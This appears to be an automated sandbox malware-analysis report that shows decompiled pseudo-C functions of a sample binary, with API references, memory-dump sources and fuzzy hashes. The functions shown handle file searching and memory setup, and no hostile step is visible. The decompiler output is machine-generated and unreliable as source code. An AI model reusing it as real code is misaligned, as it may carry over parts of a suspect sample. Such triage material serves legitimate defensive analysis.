                								E003DAB1A(_t155 + 0x21b8, _t149,  *((intOrPtr*)(_t155 + 0x5658)), 1);
                								_t133 =  *((intOrPtr*)(_t155 + 0x5644));
                								_t91 =  *((intOrPtr*)(_t155 + 0x5640));
                								 *((intOrPtr*)(_t155 + 0x2124)) = _t133;
                								 *((intOrPtr*)(_t155 + 0x211c)) = _t133;
                								 *((intOrPtr*)(_t155 + 0x2120)) = _t91;
                								 *((intOrPtr*)(_t155 + 0x2118)) = _t91;
                								 *((char*)(_t155 + 0x2128)) = _t125;
                								E003DD099(_t155 + 0x20f8, _t155,  *(_t157 + 0xc));
                								 *((char*)(_t155 + 0x2129)) =  *((intOrPtr*)(_t157 + 0x10));
                								 *((char*)(_t155 + 0x214f)) =  *((intOrPtr*)(_t155 + 0x5681));
                								 *((intOrPtr*)(_t155 + 0x2138)) = _t155 + 0x45e8;
                								 *((intOrPtr*)(_t155 + 0x213c)) = _t125;
                								_t96 =  *((intOrPtr*)(_t155 + 0x5648));
                								_t135 =  *(_t155 + 0x564c);
                								 *((intOrPtr*)(_t157 - 0x9aa4)) = _t96;
                								 *(_t157 - 0x9aa0) = _t135;
                								 *((char*)(_t157 - 0x9a8c)) = _t125;
                								__eflags =  *((intOrPtr*)(_t155 + 0x4608)) - _t125;
                								if(__eflags != 0) {
                									E003E3020(_t157 - 0xe6ec,  *((intOrPtr*)(_t155 + 0x4604)), _t125);
                								} else {
                									_push(_t135);
                									_push(_t96);
                									_push(_t155 + 0x20f8); // executed
                									E003D9215(_t125, _t152, __eflags); // executed
                								}
                								asm("sbb eax, eax");
                								__eflags = E003DAAEA(_t125, _t155 + 0x21b8, _t155 + 0x5658,  ~( *(_t155 + 0x56b2) & 0x000000ff) & _t155 + 0x000056b3);
                								if(__eflags != 0) {
                									_t125 = 1;
                								} else {
                									E003D2021(__eflags, 0x1f, _t155 + 0x32, _t155 + 0x4610);
                									E003D6D83(0x411098, 3);
                									__eflags = _t152;
                									if(_t152 != 0) {
                										E003D3EDE(_t152);
                									}
                								}
                								L25:
                								E003E2297(_t157 - 0xe6ec, _t152, _t155);
                								_t79 = _t125;
                								goto L28;
                							}
                							_t149 =  *((intOrPtr*)(_t155 + 0x21d4));
                							__eflags =  *((intOrPtr*)(_t149 + 0x6124)) - _t125;
                							if( *((intOrPtr*)(_t149 + 0x6124)) == _t125) {
                								goto L25;
                							}
                							asm("sbb ecx, ecx");
                							_t144 =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
                							__eflags =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
                							E003DD051(_t155 + 0x20f8, _t125,  *((intOrPtr*)(_t155 + 0x5684)), _t149 + 0x6024, _t144, _t155 + 0x5699,  *((intOrPtr*)(_t155 + 0x56d4)), _t155 + 0x56b3, _t155 + 0x56aa);
                							goto L18;
                						}
                						__eflags =  *(_t155 + 0x564c);
                						if(__eflags < 0) {
                							L12:
                							__eflags = _t152;
                							if(_t152 != 0) {
                								E003D20BD(_t152,  *((intOrPtr*)(_t155 + 0x5648)));
                								E003DD0B6(_t155 + 0x20f8,  *_t152,  *((intOrPtr*)(_t155 + 0x5648)));
                							} else {
                								 *((char*)(_t155 + 0x2129)) = 1;
                							}
                							goto L15;
                						}
                						if(__eflags > 0) {
                							L11:
                							E003D138B(__eflags, 0x1e, _t155 + 0x32);
                							goto L25;
                						}
                						__eflags =  *((intOrPtr*)(_t155 + 0x5648)) - 0x1000000;
                						if(__eflags <= 0) {
                							goto L12;
                						}
                						goto L11;
                					}
                					__eflags =  *((intOrPtr*)(__ecx + 0x5681)) - _t86;
                					if( *((intOrPtr*)(__ecx + 0x5681)) != _t86) {
                						goto L7;
                					} else {
                						_t79 = 1;
                						goto L28;
                					}
                				} else {
                					E003D138B(_t160, 0x1d, __ecx + 0x32);
                					E003D6D83(0x411098, 3);
                					L27:
                					_t79 = 0;
                					L28:
                					 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
                					return _t79;
                				}
                			}



















                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: ba368a60ee6e657c8be3176cb623d0b76874b04b3a9eafc5e5e035963ce666c8
                • Instruction ID: 9b4777cd13dd0a551775bd300ef72e9981925b948feb68a1c62640b17d7417bd
                • Opcode Fuzzy Hash: ba368a60ee6e657c8be3176cb623d0b76874b04b3a9eafc5e5e035963ce666c8
                • Instruction Fuzzy Hash: B371D473500B849EDB26DB70D8559E7B7E9AF14301F41092FE2AB87381DA326A84DF12
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E003D8284(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                				void* __esi;
                				char _t48;
                				void* _t51;
                				intOrPtr _t54;
                				void* _t56;
                				char _t58;
                				signed int _t84;
                				intOrPtr _t85;
                				void* _t92;
                				void* _t93;
                				void* _t94;
                				intOrPtr _t95;
                				intOrPtr _t97;
                				void* _t99;
                				void* _t102;
                
                				_t102 = __eflags;
                				_t94 = __edi;
                				_t92 = __edx;
                				E003EEB78(0x402831, _t99);
                				E003EEC50(0x9d64);
                				_t97 = __ecx;
                				_t1 = _t99 - 0x9d70; // -38256
                				_push( *((intOrPtr*)(__ecx + 8)));
                				E003D13DC(_t1, __edi, _t102);
                				 *((intOrPtr*)(_t99 - 4)) = 0;
                				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 0x82de)) == 0) {
                					_t8 = _t99 - 0x9d70; // -38256
                					_t48 = E003D9F42(_t8, __edi, __ecx, __ecx + 0xfe);
                					__eflags = _t48;
                					if(_t48 != 0) {
                						goto L3;
                					}
                				} else {
                					 *((intOrPtr*)(_t99 - 0x9d60)) = 1;
                					L3:
                					_t9 = _t99 - 0x9d70; // -38256, executed
                					_t51 = E003D1A04(_t9, _t92, 1); // executed
                					if(_t51 != 0) {
                						__eflags =  *((intOrPtr*)(_t99 - 0x3093));
                						if( *((intOrPtr*)(_t99 - 0x3093)) == 0) {
                							_push(_t94);
                							_t95 = 0;
                							__eflags =  *((intOrPtr*)(_t99 - 0x30a3));
                							if(__eflags != 0) {
                								_t12 = _t99 - 0x9d3e; // -38206
                								_t13 = _t99 - 0x1010; // -2064
                								_t65 = E003E0602(_t13, _t12, 0x800);
                								__eflags =  *((intOrPtr*)(_t99 - 0x309e));
                								while(1) {
                									_t19 = _t99 - 0x1010; // -2064
                									E003DC0C5(_t19, 0x800, (_t65 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
                									_t20 = _t99 - 0x2058; // -6232
                									E003D6EDB(_t20);
                									_push(0);
                									_t21 = _t99 - 0x2058; // -6232
                									_t22 = _t99 - 0x1010; // -2064
                									__eflags = E003DA56D(_t20, __eflags, _t22, _t21);
                									if(__eflags == 0) {
                										break;
                									}
                									_t95 = _t95 +  *((intOrPtr*)(_t99 - 0x1058));
                									asm("adc ebx, [ebp-0x1054]");
                									__eflags =  *((char*)(_t99 - 0x309e));
                								}
                								 *((intOrPtr*)(_t97 + 0xa0)) =  *((intOrPtr*)(_t97 + 0xa0)) + _t95;
                								asm("adc [esi+0xa4], ebx");
                							}
                							_t25 = _t99 - 0x9d70; // -38256
                							E003D8430(_t97, __eflags, _t25);
                							_t54 =  *((intOrPtr*)(_t97 + 8));
                							_t93 = 0x49;
                							_pop(_t94);
                							_t84 =  *(_t54 + 0x92fa) & 0x0000ffff;
                							__eflags = _t84 - 0x54;
                							if(_t84 == 0x54) {
                								L13:
                								 *((char*)(_t54 + 0x7201)) = 1;
                							} else {
                								__eflags = _t84 - _t93;
                								if(_t84 == _t93) {
                									goto L13;
                								}
                							}
                							_t85 =  *((intOrPtr*)(_t97 + 8));
                							__eflags =  *((intOrPtr*)(_t85 + 0x92fa)) - _t93;
                							if( *((intOrPtr*)(_t85 + 0x92fa)) != _t93) {
                								 *((char*)(_t85 + 0x7201)) =  *((char*)(_t85 + 0x7201)) == 0;
                								E003E1B66((_t97 + 0x000000fe & 0xffffff00 |  *((char*)(_t85 + 0x7201)) == 0x00000000) & 0x000000ff, _t97 + 0xfe);
                							}
                							_t35 = _t99 - 0x9d70; // -38256
                							E003D1F6D(_t35, _t93);
                							do {
                								_t36 = _t99 - 0x9d70; // -38256
                								_t56 = E003D3B2D(_t36, _t93, _t97);
                								_t37 = _t99 - 0xd; // 0x7f3
                								_t38 = _t99 - 0x9d70; // -38256
                								_t58 = E003D848E(_t97, _t38, _t56, _t37); // executed
                								__eflags = _t58;
                							} while (_t58 != 0);
                						}
                					} else {
                						E003D6D83(0x411098, 1);
                					}
                				}
                				_t39 = _t99 - 0x9d70; // -38256, executed
                				E003D1692(_t39, _t94, _t97); // executed
                				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
                				return 0;
                			}



















                APIs
                • __EH_prolog.LIBCMT ref: 003D8289
                  • Part of subcall function 003D13DC: __EH_prolog.LIBCMT ref: 003D13E1
                  • Part of subcall function 003DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 003DA598
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog$CloseFind
                • String ID:
                • API String ID: 2506663941-0
                • Opcode ID: fd28f9ff965d6762a5013d374ceb682670135c8f6c05f52093256f7987ddbca8
                • Instruction ID: e53aed42259402972c02d7449f85d6113751df1a4569f437845b9091f44cf8c3
                • Opcode Fuzzy Hash: fd28f9ff965d6762a5013d374ceb682670135c8f6c05f52093256f7987ddbca8
                • Instruction Fuzzy Hash: BE41D9769446589ADB26DB61DC55BEEB378AF00304F0404EBE08E5B283EB746FC8CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E003D13E1(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                				void* _t55;
                				signed int _t61;
                				char _t63;
                				intOrPtr _t73;
                				char _t82;
                				void* _t87;
                				intOrPtr _t89;
                				void* _t91;
                				void* _t96;
                
                				_t96 = __eflags;
                				_t87 = __edi;
                				E003EEB78(_t55, _t91);
                				_push(__ecx);
                				_push(__ecx);
                				_t89 = __ecx;
                				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
                				E003D9556(__ecx);
                				 *((intOrPtr*)(__ecx)) = 0x4035f8;
                				 *((intOrPtr*)(_t91 - 4)) = 0;
                				E003D5E37(__ecx + 0x1038, _t96);
                				 *((char*)(_t91 - 4)) = 1;
                				E003DCE40(__ecx + 0x20f8, __edx, _t96);
                				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
                				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
                				E003D157A();
                				_t61 = E003D157A();
                				_t82 =  *((intOrPtr*)(_t91 + 8));
                				 *((char*)(_t91 - 4)) = 4;
                				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
                				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
                				_t98 = _t82;
                				if(_t82 != 0) {
                					_t63 = _t82;
                				} else {
                					_push(0x92f0);
                					_t73 = E003EEB38(__edx, _t98);
                					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
                					 *((char*)(_t91 - 4)) = 5;
                					if(_t73 == 0) {
                						_t63 = 0;
                					} else {
                						_t63 = E003DB505(_t73); // executed
                					}
                				}
                				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
                				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
                				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
                				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
                				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
                				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
                				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
                				 *((char*)(_t89 + 0x6cd4)) = 0;
                				 *((short*)(_t89 + 0x6cdc)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
                				E003EFFF0(_t87, _t89 + 0x2220, 0, 0x40);
                				E003EFFF0(_t87, _t89 + 0x2260, 0, 0x34);
                				E003EFFF0(_t87, _t89 + 0x45a8, 0, 0x20);
                				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
                				 *((short*)(_t89 + 0x6d12)) = 0;
                				 *((char*)(_t89 + 0x6cee)) = 0;
                				 *((char*)(_t89 + 0x6d10)) = 0;
                				 *((char*)(_t89 + 0x21f8)) = 0;
                				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                				return _t89;
                			}













                APIs
                • __EH_prolog.LIBCMT ref: 003D13E1
                  • Part of subcall function 003D5E37: __EH_prolog.LIBCMT ref: 003D5E3C
                  • Part of subcall function 003DCE40: __EH_prolog.LIBCMT ref: 003DCE45
                  • Part of subcall function 003DB505: __EH_prolog.LIBCMT ref: 003DB50A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6dad22388140cdff8f487833450f094af8b8afc6ed2d8782943e804932e42da3
                • Instruction ID: 4d27041dae6634710f5738f90a7d227507fc64a2a583e75cc78a384dc52e2e52
                • Opcode Fuzzy Hash: 6dad22388140cdff8f487833450f094af8b8afc6ed2d8782943e804932e42da3
                • Instruction Fuzzy Hash: F3416DB1905B409EE725CF399885AE6FBE5BF19300F504A2ED5FE87281C7716654CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E003D13DC(intOrPtr __ecx, void* __edi, void* __eflags) {
                				signed int _t61;
                				char _t63;
                				intOrPtr _t73;
                				char _t82;
                				void* _t86;
                				void* _t87;
                				intOrPtr _t89;
                				void* _t91;
                				void* _t96;
                
                				_t96 = __eflags;
                				_t87 = __edi;
                				E003EEB78(0x402635, _t91);
                				_push(__ecx);
                				_push(__ecx);
                				_t89 = __ecx;
                				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
                				E003D9556(__ecx);
                				 *((intOrPtr*)(__ecx)) = 0x4035f8;
                				 *((intOrPtr*)(_t91 - 4)) = 0;
                				E003D5E37(__ecx + 0x1038, _t96);
                				 *((char*)(_t91 - 4)) = 1;
                				E003DCE40(__ecx + 0x20f8, _t86, _t96);
                				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
                				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
                				E003D157A();
                				_t61 = E003D157A();
                				_t82 =  *((intOrPtr*)(_t91 + 8));
                				 *((char*)(_t91 - 4)) = 4;
                				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
                				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
                				_t98 = _t82;
                				if(_t82 != 0) {
                					_t63 = _t82;
                				} else {
                					_push(0x92f0);
                					_t73 = E003EEB38(_t86, _t98);
                					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
                					 *((char*)(_t91 - 4)) = 5;
                					if(_t73 == 0) {
                						_t63 = 0;
                					} else {
                						_t63 = E003DB505(_t73); // executed
                					}
                				}
                				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
                				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
                				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
                				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
                				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
                				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
                				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
                				 *((char*)(_t89 + 0x6cd4)) = 0;
                				 *((short*)(_t89 + 0x6cdc)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
                				E003EFFF0(_t87, _t89 + 0x2220, 0, 0x40);
                				E003EFFF0(_t87, _t89 + 0x2260, 0, 0x34);
                				E003EFFF0(_t87, _t89 + 0x45a8, 0, 0x20);
                				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
                				 *((short*)(_t89 + 0x6d12)) = 0;
                				 *((char*)(_t89 + 0x6cee)) = 0;
                				 *((char*)(_t89 + 0x6d10)) = 0;
                				 *((char*)(_t89 + 0x21f8)) = 0;
                				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                				return _t89;
                			}













                APIs
                • __EH_prolog.LIBCMT ref: 003D13E1
                  • Part of subcall function 003D5E37: __EH_prolog.LIBCMT ref: 003D5E3C
                  • Part of subcall function 003DCE40: __EH_prolog.LIBCMT ref: 003DCE45
                  • Part of subcall function 003DB505: __EH_prolog.LIBCMT ref: 003DB50A
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 171ca2b53f16aadb1c35795779639ce34fb9bcb61755c23e65ff669690460190
                • Instruction ID: 380bc6ecf564ff3d56fb2336bf1cdaad6810a193f099b4061d0597d8235c37a8
                • Opcode Fuzzy Hash: 171ca2b53f16aadb1c35795779639ce34fb9bcb61755c23e65ff669690460190
                • Instruction Fuzzy Hash: 60416AB1905B409EE725DF3A8885AE6FBE5BF19300F504A2ED5FE87282CB716654CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E003E359E(void* __ecx, void* __edx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t29;
                				signed int* _t36;
                				signed int _t38;
                				intOrPtr _t39;
                				intOrPtr _t42;
                				signed int _t44;
                				void* _t47;
                				void* _t60;
                				signed int _t65;
                				void* _t67;
                				void* _t69;
                				void* _t73;
                
                				_t29 = E003EEB78(0x402a92, _t67);
                				_push(__ecx);
                				_push(__ecx);
                				_t60 = __ecx;
                				_t44 = 0;
                				_t72 =  *((intOrPtr*)(__ecx + 0x20));
                				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
                					_push(0x400400); // executed
                					_t42 = E003EEE53(__ecx, __edx, _t72); // executed
                					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
                					_t29 = E003EFFF0(__ecx, _t42, 0, 0x400400);
                					_t69 = _t69 + 0x10;
                				}
                				_t73 =  *(_t60 + 0x18) - _t44;
                				if(_t73 == 0) {
                					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
                					_t30 = _t65;
                					 *(_t67 - 0x10) = _t65;
                					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t65 * 0x00004ae4) + 0x00000004);
                					_t36 = E003EEE53(( ~(_t73 > 0) | _t65 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t73);
                					_pop(0x411098);
                					 *(_t67 - 0x14) = _t36;
                					 *(_t67 - 4) = _t44;
                					_t74 = _t36;
                					if(_t36 != 0) {
                						_push(E003E2360);
                						_push(E003E21C0);
                						_push(_t65);
                						_t16 =  &(_t36[1]); // 0x4
                						_t44 = _t16;
                						 *_t36 = _t65;
                						_push(0x4ae4);
                						_push(_t44);
                						E003EEC7B(_t44, _t60, _t65, _t74);
                					}
                					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                					 *(_t60 + 0x18) = _t44;
                					_t29 = E003EFFF0(_t60, _t44, 0, _t65 * 0x4ae4);
                					if(_t65 != 0) {
                						_t38 = 0;
                						 *(_t67 - 0x10) = 0;
                						do {
                							_t47 =  *(_t60 + 0x18) + _t38;
                							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
                								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
                								_t39 = E003F3E33(0x411098); // executed
                								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
                								0x411098 = 0x30c00;
                								if(_t39 == 0) {
                									E003D6CA7(0x411098);
                								}
                								_t38 =  *(_t67 - 0x10);
                							}
                							_t38 = _t38 + 0x4ae4;
                							 *(_t67 - 0x10) = _t38;
                							_t65 = _t65 - 1;
                						} while (_t65 != 0);
                					}
                				}
                				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
                				return _t29;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 8e77410dd84df68dbc9d33eae1b619650232661122dbd4c056d4c28ae65fdb0b
                • Instruction ID: 9c7382d38cdb94dbc40b53a05812d14ac6dd513166cdd366d1db4e9fdc6cc8a4
                • Opcode Fuzzy Hash: 8e77410dd84df68dbc9d33eae1b619650232661122dbd4c056d4c28ae65fdb0b
                • Instruction Fuzzy Hash: DE21E6B1E40265AFDB159F76CC4666B7768FB14314F11033AE505AB7C1D7B49A00C6A8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E003EB093(void* __ecx, void* __edx, void* __eflags) {
                				void* __edi;
                				void* __esi;
                				char _t39;
                				char _t41;
                				char _t60;
                				char _t65;
                				signed int _t70;
                				void* _t72;
                				intOrPtr _t74;
                				void* _t77;
                
                				_t77 = __eflags;
                				E003EEB78(0x402ae8, _t72);
                				_push(__ecx);
                				E003EEC50(0x7d2c);
                				_push(_t70);
                				_push(_t68);
                				 *((intOrPtr*)(_t72 - 0x10)) = _t74;
                				 *((intOrPtr*)(_t72 - 4)) = 0;
                				E003D13DC(_t72 - 0x7d3c, _t68, _t77, 0); // executed
                				 *((char*)(_t72 - 4)) = 1;
                				E003D1FDC(_t72 - 0x7d3c, __edx, _t70, _t72, _t77,  *((intOrPtr*)(_t72 + 0xc)));
                				if( *((intOrPtr*)(_t72 - 0x105f)) == 0) {
                					 *((intOrPtr*)(_t72 - 0x24)) = 0;
                					 *(_t72 - 0x20) = 0;
                					 *((intOrPtr*)(_t72 - 0x1c)) = 0;
                					 *((intOrPtr*)(_t72 - 0x18)) = 0;
                					 *((char*)(_t72 - 0x14)) = 0;
                					 *((char*)(_t72 - 4)) = 2;
                					_push(_t72 - 0x24);
                					_t59 = _t72 - 0x7d3c;
                					_t39 = E003D19AF(_t72 - 0x7d3c, __edx);
                					__eflags = _t39;
                					if(_t39 != 0) {
                						_t70 =  *(_t72 - 0x20);
                						_t68 = _t70 + _t70;
                						_push(_t70 + _t70 + 2);
                						_t65 = E003F3E33(_t59);
                						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x10)))) = _t65;
                						__eflags = _t65;
                						if(_t65 != 0) {
                							__eflags = 0;
                							 *((short*)(_t65 + _t70 * 2)) = 0;
                							E003F0320(_t65,  *((intOrPtr*)(_t72 - 0x24)), _t68);
                						} else {
                							_t70 = 0;
                						}
                						 *( *(_t72 + 0x14)) = _t70;
                					}
                					_t60 =  *((intOrPtr*)(_t72 - 0x24));
                					 *((char*)(_t72 - 4)) = 3;
                					__eflags = _t60;
                					if(_t60 != 0) {
                						__eflags =  *((char*)(_t72 - 0x14));
                						if( *((char*)(_t72 - 0x14)) != 0) {
                							__eflags =  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c));
                							E003DF445(_t60,  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c)));
                							_t60 =  *((intOrPtr*)(_t72 - 0x24));
                						}
                						L003F3E2E(_t60);
                					}
                					E003D1692(_t72 - 0x7d3c, _t68, _t70); // executed
                					_t41 = 1;
                				} else {
                					E003D1692(_t72 - 0x7d3c, _t68, _t70);
                					_t41 = 0;
                				}
                				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
                				return _t41;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 003EB098
                  • Part of subcall function 003D13DC: __EH_prolog.LIBCMT ref: 003D13E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
